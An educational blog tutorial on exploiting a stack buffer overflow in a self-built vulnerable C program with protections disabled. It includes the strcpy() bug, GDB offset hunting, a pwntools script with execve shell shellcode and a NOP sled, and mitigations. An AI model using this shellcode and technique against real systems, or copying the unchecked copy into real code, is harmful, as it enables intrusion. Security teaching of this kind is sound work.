How to Find and Exploit a Simple Buffer Overflow Vulnerability

Introduction

In the world of software security, the buffer overflow is a classic, almost legendary, vulnerability. First widely publicized by the Morris Worm in 1988, it’s a bug that arises from a simple mistake: writing more data into a fixed-size block of memory (a “buffer”) than it was allocated to hold. This overflow can corrupt adjacent memory, crash the program, or, in the hands of an attacker, be weaponized to hijack the program’s execution flow and run arbitrary code.

While modern languages and compilers have introduced many safeguards, buffer overflows are still a serious threat, especially in performance-critical C and C++ codebases, firmware, and legacy systems. Understanding how to find and exploit one is a rite of passage for any security researcher or aspiring exploit developer.

This post will guide you through the entire process of finding, analyzing, and writing a proof-of-concept exploit for a simple stack-based buffer overflow vulnerability. Our target will be a small, intentionally vulnerable C program. Our goal is to take control of the application and spawn a command shell.

Tools & Environment Setup

To follow along, you’ll need a Linux environment. A virtual machine running a distribution like Ubuntu 22.04 or Kali Linux is perfect.

Here are the tools we’ll be using:

GCC (GNU Compiler Collection): The standard C compiler on Linux.
GDB (GNU Debugger): A powerful debugger for analyzing our program’s state at runtime. We’ll enhance it with pwndbg, a GDB extension that makes exploit development much easier.
Python 3 with pwntools: A god-tier CTF framework and exploit development library that simplifies process interaction, payload generation, and much more.

1. Install The Essentials:

sudo apt-get update
sudo apt-get install -y build-essential gdb python3 python3-pip

2. Install pwntools:

pip3 install pwntools

3. Install pwndbg:

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

With our lab ready, let’s create our vulnerable target.

Static Analysis: Finding the Flaw

Static analysis involves examining the code without running it. It’s often the first step in identifying potential vulnerabilities.

The Vulnerable Code

Here is our target application. Save this code as vuln.c.

// vuln.c
#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[100]; // A small, fixed-size buffer
    strcpy(buffer, input); // Uh oh! No size check.
    printf("You entered: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

The bug is in the vulnerable_function. It uses strcpy() to copy the command-line argument directly into a 100-byte buffer. The strcpy() function doesn’t perform any bounds checking; it will happily write past the end of the buffer if the input is longer than 99 characters (plus one for the null terminator). This is our buffer overflow.
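To make the effect of the missing bounds check concrete, here is a minimal Python model of the stack frame. It is a sketch under stated assumptions, not the real memory layout: the frame is a flat bytearray, the saved frame pointer and return address follow the buffer with no padding, and the names make_frame, unchecked_copy, and saved_return_address, as well as the two addresses, are made up for illustration.

```python
import struct

BUF_SIZE = 100                 # size of `buffer` in vuln.c
SAVED_RBP = 0x7fffffffdc00     # hypothetical saved frame pointer
RETURN_ADDR = 0x401196         # hypothetical address back in main()

def make_frame():
    """Return a bytearray laid out as [buffer][saved RBP][return address]."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", SAVED_RBP, RETURN_ADDR))

def unchecked_copy(frame, data):
    """Mimic strcpy(): copy up to the first NUL, add a terminator, never check the size."""
    data = data.split(b"\x00", 1)[0] + b"\x00"
    frame[0:len(data)] = data

def saved_return_address(frame):
    """Read the 8-byte little-endian return address stored after the saved RBP."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]

frame = make_frame()
unchecked_copy(frame, b"A" * 99)            # fits: 99 bytes plus the terminator
print(hex(saved_return_address(frame)))     # 0x401196

unchecked_copy(frame, b"A" * 116)           # runs past the buffer
print(hex(saved_return_address(frame)))     # 0x4141414141414141
```

The first copy leaves the return address alone; the second one replaces it with attacker-chosen bytes, which is the whole vulnerability in miniature.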

Compiling for Exploitation

Modern compilers have protections that can make exploitation harder. For this tutorial, we will disable them to focus on the core concepts.

-fno-stack-protector: Disables stack canaries, which are designed to detect stack buffer overflows.
-z execstack: Makes the stack executable. Modern systems have a non-executable (NX) stack to prevent shellcode from running, but this flag overrides it.
-no-pie: Disables Position-Independent Executable, which makes it easier to predict memory addresses.

Compile the code with these flags, plus -g so that GDB can show source lines and variable names later:

gcc -g -fno-stack-protector -z execstack -no-pie -o vuln vuln.c

You now have an executable file named vuln.
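Whether the flags took effect is recorded in the ELF file itself: the file type field distinguishes fixed-address from position-independent binaries, and the PT_GNU_STACK program header carries the stack permissions. The following is a rough sketch that reads both, assuming a 64-bit little-endian ELF file; describe_elf is a hypothetical helper name, and treating every ET_DYN file as PIE is a simplification (shared libraries use the same type).

```python
import struct

ET_DYN = 3                   # e_type of position-independent files (ET_EXEC is 2)
PT_GNU_STACK = 0x6474E551    # program header that describes stack permissions
PF_X = 0x1                   # "executable" permission bit in p_flags

def describe_elf(data):
    """Report PIE and executable-stack status for a 64-bit little-endian ELF image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    exec_stack = None        # None means no PT_GNU_STACK header was found
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "exec_stack": exec_stack}
```

Calling describe_elf(open("vuln", "rb").read()) on the binary built above should report pie as False and exec_stack as True if both flags were honored.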

Dynamic Analysis & Fuzzing: Making it Crash

Now let’s run the program and see if we can trigger the vulnerability. The goal is to provide an input so large that it overwrites critical data on the stack, specifically the return address. The return address tells the CPU where to go back to after the current function (vulnerable_function) finishes. If we can control it, we can control the program.

1. A Simple Crash

Let’s start by feeding it a long string of ‘A’s. Python is great for this.

./vuln $(python3 -c "print('A'*200)")

You should see a Segmentation fault. This is a good sign! It means we wrote data where we shouldn’t have, and the program tried to return to an invalid memory address.

2. Analyzing the Crash in GDB

Let’s see exactly what happened using GDB with pwndbg.

gdb ./vuln

Inside GDB, run the program with the same oversized input:

pwndbg> run $(python3 -c "print('A'*200)")

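The program will crash, and pwndbg will give you a color-coded view of the CPU state. On 32-bit x86 the instruction pointer (EIP) would now read 0x41414141. On x86-64 the picture is slightly different: 0x4141414141414141 is not a canonical address, so the CPU faults on the ret instruction itself, before RIP is loaded. RIP still points at the ret in vulnerable_function, and the overwritten return address sits at the top of the stack, where RSP points.

...
Program received signal SIGSEGV, Segmentation fault.
...
──────────────────────────[ REGISTERS ]──────────────────────────
...
RSP: ... -> 0x4141414141414141 ('AAAAAAAA')
RIP: ... <vulnerable_function+...> (ret)
...

0x41 is the hexadecimal representation of the ASCII character ‘A’. Seeing 0x4141414141414141 at the top of the stack while RIP is parked on ret is the “Eureka!” moment. It proves that we have overwritten the saved return address and can control where the program executes next, as long as we supply an address the CPU accepts.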
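The link between the input bytes and the value the debugger shows can be checked in a few lines of Python. The sketch below also tests whether a value is a canonical x86-64 address, which matters because a ret to a non-canonical value faults at the ret instruction instead of loading it into RIP. It assumes 48-bit virtual addressing (the common case); is_canonical is an illustrative helper, not a library function.

```python
def is_canonical(addr):
    """True if bits 47..63 of a 64-bit value are all equal (48-bit virtual addressing)."""
    top17 = addr >> 47
    return top17 == 0 or top17 == 0x1FFFF

# Eight 'A' bytes read back as a little-endian 64-bit integer
overwritten = int.from_bytes(b"A" * 8, "little")
print(hex(overwritten))                # 0x4141414141414141
print(is_canonical(overwritten))       # False
print(is_canonical(0x7fffffffdc50))    # True: a typical user-space stack address
```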

3. Finding the Exact Offset

We know we can control RIP, but we need to know exactly how many bytes of input it takes to do so. We’ll use a unique, non-repeating pattern of characters called a De Bruijn sequence.

First, generate a pattern using pwntools:

python3 -c "from pwn import *; print(cyclic(200).decode())"
# Output will be something like: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama...

Now, run the program in GDB with this pattern as input:

pwndbg> run $(python3 -c "from pwn import *; print(cyclic(200).decode())")

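The program crashes again. This time, look at the 8 bytes at the top of the stack (the value RSP points to). On x86-64 the faulting ret leaves the overwritten return address there rather than in RIP. It will be a unique chunk of the pattern.

...
RSP: ... -> 0x6261616462616163 ('caabdaab')
...

We can use pwntools to find the offset of this chunk within our pattern. cyclic() uses 4-byte chunks by default, so pass the low 4 bytes of the value:

python3 -c "from pwn import *; print(cyclic_find(0x62616163))"
# Output:
# 108

This tells us that the return address is located 108 bytes after the start of our buffer. The exact number depends on how your compiler lays out the stack frame (many x86-64 GCC builds report 120 for this program), so use the value from your own run wherever 108 appears below. Our payload structure is now: 108 bytes of junk, followed by the address we want to jump to.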
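The offset lookup works because every 4-byte window of a De Bruijn sequence occurs exactly once. pwntools handles this for you; the stand-alone sketch below uses the textbook Lyndon-word construction with a lowercase alphabet and 4-byte chunks to show the idea. The names de_bruijn and find_offset are made up for illustration, and 0x62616163 ('caab') is simply the chunk that sits at offset 108 in such a pattern.

```python
from itertools import islice
from string import ascii_lowercase

def de_bruijn(alphabet, n):
    """Lazily yield a De Bruijn sequence in which every n-symbol window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def find_offset(pattern, register_value, width=4):
    """Turn a little-endian register value back into text and locate it in the pattern."""
    chunk = register_value.to_bytes(width, "little").decode("ascii")
    return pattern.find(chunk)

pattern = "".join(islice(de_bruijn(ascii_lowercase, 4), 200))
print(pattern[:16])                        # aaaabaaacaaadaaa
print(find_offset(pattern, 0x62616163))    # 108
```

The little-endian conversion is the step that is easy to get wrong by hand: the lowest byte of the register value is the first character of the chunk.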

Vulnerability & Exploitation Walkthrough

We have all the pieces. Let’s build the exploit. Our strategy is:

Craft a payload containing malicious code (shellcode) that spawns a /bin/sh shell.
Place this payload into the buffer.
Overwrite the return address with the memory address of our shellcode.

1. Preparing the Payload

Our payload will have three parts:

NOP Sled: A series of “No-Operation” instructions (\x90). If our jump address is slightly off, the CPU will slide down the NOPs until it hits our shellcode.
Shellcode: The actual machine code to execute.
Return Address: The address on the stack where our NOP sled begins.
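The three parts have to add up exactly: everything before the return address must total the measured offset, and the address itself is 8 bytes in little-endian order. The sketch below checks that arithmetic with the standard library only. It is a layout illustration under assumed values (offset 108 and the placeholder address 0x7fffffffdc50), build_layout is a hypothetical helper, and the 21 int3 bytes are a stand-in, not real shellcode.

```python
import struct

def build_layout(offset, target, code, sled_len=16):
    """Lay out [NOP sled][code][padding][8-byte little-endian address]."""
    body = b"\x90" * sled_len + code
    if len(body) > offset:
        raise ValueError("sled and code do not fit before the return address")
    return body + b"A" * (offset - len(body)) + struct.pack("<Q", target)

placeholder = b"\xcc" * 21    # stand-in bytes (int3), same length as the real code
layout = build_layout(108, 0x7fffffffdc50, placeholder)
print(len(layout))            # 116
print(layout[108:].hex())     # 50dcffffff7f0000
```

The size check is the useful part of the design: if the sled and code grow past the offset, the padding length would go negative and the address would silently land in the wrong place.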

Let’s use pwntools to create a Python exploit script. Save this as exploit.py:

# exploit.py
from pwn import *

# Set the context for our target architecture
context.update(arch='amd64', os='linux')

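# Hand-assembled shellcode that calls execve("/bin//sh").
# It does not set RDX (envp) or clear the upper bits of RAX, so it relies on
# the register state at the time of the jump; asm(shellcraft.sh()) generates
# a longer but self-contained alternative.
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x0f\x05"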

# The offset to the return address we found earlier
offset = 108

# We need to find where our buffer is located in memory.
# We'll do this by running the program under GDB and setting a breakpoint.
# Let's assume after debugging we find it starts around 0x7fffffffdc50.
# Because of the NOP sled, we don't have to be exact.
# Note: This address will CHANGE if you don't disable ASLR system-wide.
return_address = p64(0x7fffffffdc50)

# A sled of 16 NOPs
nop_sled = b"\x90" * 16

# Construct the final payload
payload = nop_sled + shellcode
payload += b"A" * (offset - len(payload)) # Padding
payload += return_address

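# Write the raw bytes to stdout for use as a command-line argument.
# print() would re-encode the text as UTF-8 and turn every byte >= 0x80
# (the NOPs and most address bytes) into two bytes, corrupting the payload.
import sys
sys.stdout.buffer.write(payload)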
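One detail worth checking in any script that emits a binary payload is how the bytes reach stdout. The sketch below, which assumes a typical UTF-8 locale, shows what happens when bytes are decoded as latin-1 and sent through print(): every byte at or above 0x80 becomes a two-byte UTF-8 sequence. The sample bytes are arbitrary.

```python
raw = b"\x90\x90\x50\xdc\xff\x7f"     # two NOPs plus some address-like bytes

as_text = raw.decode("latin-1")        # one character per byte
via_print = as_text.encode("utf-8")    # what print() writes under a UTF-8 locale

print(len(raw), len(via_print))        # 6 10
print(via_print.hex())                 # c290c29050c39cc3bf7f
```

Writing through sys.stdout.buffer.write(raw) bypasses the text layer and emits the six bytes unchanged.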

2. Finding the Return Address

The return_address in the script above is a placeholder. We need to find the actual address of our buffer on the stack.

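Start vuln in GDB: gdb ./vuln. Set a breakpoint on vulnerable_function. GDB stops right after the function prologue, just before the strcpy call, so we can inspect the frame before the overflow happens. (The source-level output below requires a binary compiled with -g.)

pwndbg> b vulnerable_function
Breakpoint 1 at 0x40114e: file vuln.c, line 7.
pwndbg> run AAAA
...
Breakpoint 1, vulnerable_function (input=0x7fffffffdfe6 "AAAA") at vuln.c:7
7       strcpy(buffer, input);

Now, examine the stack. The buffer is a local variable, so it lives in the current stack frame, a little above the stack pointer (RSP).

pwndbg> p $rsp
$1 = (void *) 0x7fffffffdb90
pwndbg> x/100xb $rsp
0x7fffffffdb90: 0x00 0x00 0x00 ...

RSP itself is only a lower bound. The frame also holds the saved copy of the input pointer, and a jump that lands below the buffer executes those bytes instead of the NOP sled. With debug info, p &buffer prints the exact start of the buffer; in a typical unoptimized x86-64 GCC build it is 16 bytes above RSP, which would be 0x7fffffffdba0 here. Stack addresses also move with the length of the arguments and the contents of the environment, so repeat this step with an argument as long as the final payload, and expect a small difference between runs inside and outside GDB. Let’s update our exploit.py script with this address (your address will be different).

# In exploit.py
...
# Update with the address you found in GDB
return_address = p64(0x7fffffffdba0)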
...
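Two properties of the packed address affect how it survives the trip through a command-line argument, and both can be checked offline. The sketch below uses the placeholder address from the script. It assumes bash-style handling, where NUL bytes are dropped from a command substitution and unquoted whitespace bytes split the argument. The helper names are illustrative.

```python
import struct

def as_argv_bytes(payload):
    """Model what reaches argv: the shell drops NUL bytes from a command substitution."""
    return payload.replace(b"\x00", b"")

def splitting_bytes(payload):
    """Return the bytes that would split an unquoted shell argument (space, tab, newline)."""
    return [b for b in payload if b in b" \t\n"]

addr = struct.pack("<Q", 0x7fffffffdc50)
print(addr.hex())                    # 50dcffffff7f0000
print(as_argv_bytes(addr).hex())     # 50dcffffff7f
print(splitting_bytes(addr))         # []
```

Only six address bytes arrive, which is why the address has to be the last thing in the payload: strcpy() appends its own terminator as the seventh byte, and the eighth byte of the original return address is already zero for a non-PIE binary loaded at a low address.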

3. Gaining the Shell

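Let’s execute the final exploit. We’ll run vuln and pass the output of our Python script as its argument. Outside GDB, ASLR has to be off for the hardcoded address to hold; setarch -R disables it for a single process.

# First, generate the payload and save it to a file to avoid shell interpretation issues
python3 exploit.py > payload.bin

# Now, run the exploit! The quotes stop the shell from splitting the payload on whitespace bytes.
setarch "$(uname -m)" -R ./vuln "$(cat payload.bin)"

# If successful, the program echoes the payload as unreadable bytes and then hands you a new shell!
$ whoami
app-user
$ ls -la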
total 28
drwxr-xr-x 3 app-user app-user 4096 Nov 11 01:41 .
drwxr-xr-x 4 app-user app-user 4096 Nov 11 01:41 ..
-rwxr-xr-x 1 app-user app-user 16808 Nov 11 01:41 vuln
-rw-r--r-- 1 app-user app-user 302 Nov 11 01:41 vuln.c
-rw-r--r-- 1 app-user app-user 451 Nov 11 01:41 exploit.py
-rw-r--r-- 1 app-user app-user 121 Nov 11 01:41 payload.bin
$ exit

Success! We overflowed the buffer, redirected execution to our shellcode, and got a shell running with the privileges of the vulnerable program.

Mitigation & Conclusion

We successfully exploited this program because we disabled several key security features. In the real world, these protections are almost always enabled.

How to Prevent Buffer Overflows:

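Secure Coding: The root cause was using strcpy(). Developers should use functions that take the destination size, such as snprintf() or, where available, strlcpy(). strncpy() also takes a size, but it does not null-terminate the destination when the source is too long, so it needs an explicit terminator after the call.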
Stack Canaries: The -fstack-protector flag we disabled places a random value (a “canary”) on the stack before the return address. Before a function returns, it checks if the canary is intact. Our overflow would have corrupted it, causing the program to safely abort instead of jumping to our shellcode.
Non-Executable Stack (NX / DEP): We used -z execstack to make the stack executable. On a modern system, trying to execute code from the stack would result in a crash. Attackers bypass this using advanced techniques like Return-Oriented Programming (ROP), which reuses small snippets of existing code (“gadgets”) to perform actions.
Address Space Layout Randomization (ASLR): ASLR randomizes the starting addresses of the stack, heap, and libraries each time the program runs. This would have made it impossible for us to hardcode the return address. Bypassing ASLR often requires an additional information leak vulnerability.
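The stack canary is the easiest of these defenses to model. The sketch below is a simplified simulation, not compiler output: the frame is a flat bytearray with the canary placed directly between the buffer and the return address, the canary's first byte is zero as in glibc's scheme, and all function names and the return address are hypothetical.

```python
import os
import struct

BUF_SIZE = 100

def make_frame(canary, return_addr):
    """Build a simplified protected frame: [buffer][canary][return address]."""
    return bytearray(BUF_SIZE) + canary + struct.pack("<Q", return_addr)

def unchecked_copy(frame, data):
    """Copy data to the start of the frame with no bounds check."""
    frame[0:len(data)] = data

def safe_to_return(frame, canary):
    """The check a protected function runs before ret: is the canary intact?"""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 8]) == canary

canary = b"\x00" + os.urandom(7)      # random per process, first byte zero
frame = make_frame(canary, 0x401196)

unchecked_copy(frame, b"A" * 50)      # stays inside the buffer
print(safe_to_return(frame, canary))  # True

unchecked_copy(frame, b"A" * 116)     # reaches the return address
print(safe_to_return(frame, canary))  # False: the program would abort here
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach one without clobbering the other, and an attacker who cannot read the random value cannot put it back.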

Conclusion

This walkthrough demonstrates the fundamental mechanics of a stack-based buffer overflow. We moved from static analysis of source code to dynamic fuzzing, pinpointing the offset to control the instruction pointer, and finally crafting a payload to achieve code execution. While this was a simplified example, the core principles apply to far more complex scenarios. This exercise highlights the critical importance of secure coding and the layered defense-in-depth security mechanisms built into modern operating systems and compilers.
